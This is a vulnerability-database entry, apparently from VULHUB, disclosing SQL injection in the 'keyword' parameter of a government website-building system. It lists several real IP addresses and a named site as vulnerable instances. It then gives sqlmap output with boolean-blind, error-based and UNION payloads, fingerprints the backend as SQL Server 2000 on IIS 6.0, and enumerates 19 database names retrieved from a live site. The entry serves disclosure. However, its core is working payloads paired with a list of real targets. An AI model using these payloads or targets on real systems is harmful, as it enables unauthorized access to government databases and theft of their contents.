|某通用型政府建站系统SQL注入 - VULHUB开源网络安全威胁库

某通用型政府建站系统SQL注入

- AV AC AU C I A

发布： 2025-04-13

修订： 2025-04-13

### 简要描述： RT ### 详细说明：山东农友软件公司官网:http://www.nongyou.com.cn/ 案例如下: http://222.135.127.190:7000/gov/SearchInfoSum.aspx?keyword= http://221.2.171.59:8000/gov/SearchInfoSum.aspx?keyword= http://222.135.109.70:8100/gov/SearchInfoSum.aspx?keyword= http://61.133.119.187:8089/gov/SearchInfoSum.aspx?keyword= http://221.2.156.181:8100//gov/SearchInfoSum.aspx?keyword= http://221.2.149.47:8100/gov/SearchInfoSum.aspx?keyword= http://222.135.127.190:7000/gov/SearchInfoSum.aspx?keyword= ### 漏洞证明：参数keyword存在注入测试：http://huodong.whinfo.net.cn/gov/SearchInfoSum.aspx?keyword= ``` Place: GET Parameter: keyword Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: keyword=%' AND 3437=3437 AND '%'=' Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: keyword=%' AND 2049=CONVERT(INT,(CHAR(58) CHAR(113) CHAR(104) CHAR( 110) CHAR(58) (SELECT (CASE WHEN (2049=2049) THEN CHAR(49) ELSE CHAR(48) END)) C HAR(58) CHAR(106) CHAR(97) CHAR(122) CHAR(58))) AND '%'=' Type: UNION query Title: Generic UNION query (NULL) - 14 columns Payload: keyword=%' UNION ALL SELECT CHAR(58) CHAR(113) CHAR(104) CHAR(110) CHAR(58) CHAR(85) CHAR(110) CHAR(70) CHAR(81) CHAR(118) CHAR(84) CHAR(113) CHAR( 84) CHAR(120) CHAR(69) CHAR(58) CHAR(106) CHAR(97) CHAR(122) CHAR(58),NULL,NULL, NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- --- [21:40:08] [INFO] the back-end DBMS is Microsoft SQL Server web server operating system: Windows 2003 web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727 back-end DBMS: Microsoft SQL Server 2000 [21:40:08] [INFO] fetching database names [21:40:09] [INFO] the SQL query used returns 19 entries [21:40:14] [INFO] retrieved: "3g_shop" [21:40:15] [INFO] retrieved: "allMessage" [21:40:20] [INFO] retrieved: "club_model" [21:40:22] [INFO] retrieved: "eweb_gov" [21:40:32] [INFO] retrieved: "eweb_serve" [21:40:33] [INFO] retrieved: "eweb_sun" [21:40:41] [INFO] retrieved: "kehuSns" [21:40:45] [INFO] retrieved: "master" [21:40:46] [INFO] retrieved: "model" [21:40:52] [INFO] retrieved: "msdb" [21:40:53] [INFO] retrieved: "NetSNS" [21:40:57] [INFO] retrieved: "tempdb" [21:41:05] [INFO] retrieved: "web800" [21:41:06] [INFO] retrieved: "wh2_caijing" [21:41:08] [INFO] retrieved: "wh2_favlife" [21:41:09] [INFO] retrieved: "wh2_housenew" [21:41:13] [INFO] retrieved: "wh2_search" [21:41:14] [INFO] retrieved: "wh2_tbSMS" [21:41:15] [INFO] retrieved: "whinfo_chat" available databases [19]: [*] 3g_shop [*] allMessage [*] club_model [*] eweb_gov [*] eweb_serve [*] eweb_sun [*] kehuSns [*] master [*] model [*] msdb [*] NetSNS [*] tempdb [*] web800 [*] wh2_caijing [*] wh2_favlife [*] wh2_housenew [*] wh2_search [*] wh2_tbSMS [*] whinfo_chat ```

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息

您还没有登录，登录后可查看更多

添加资源
收藏资源
问题反馈

贡献用户

暂无贡献用户

VULHUB ™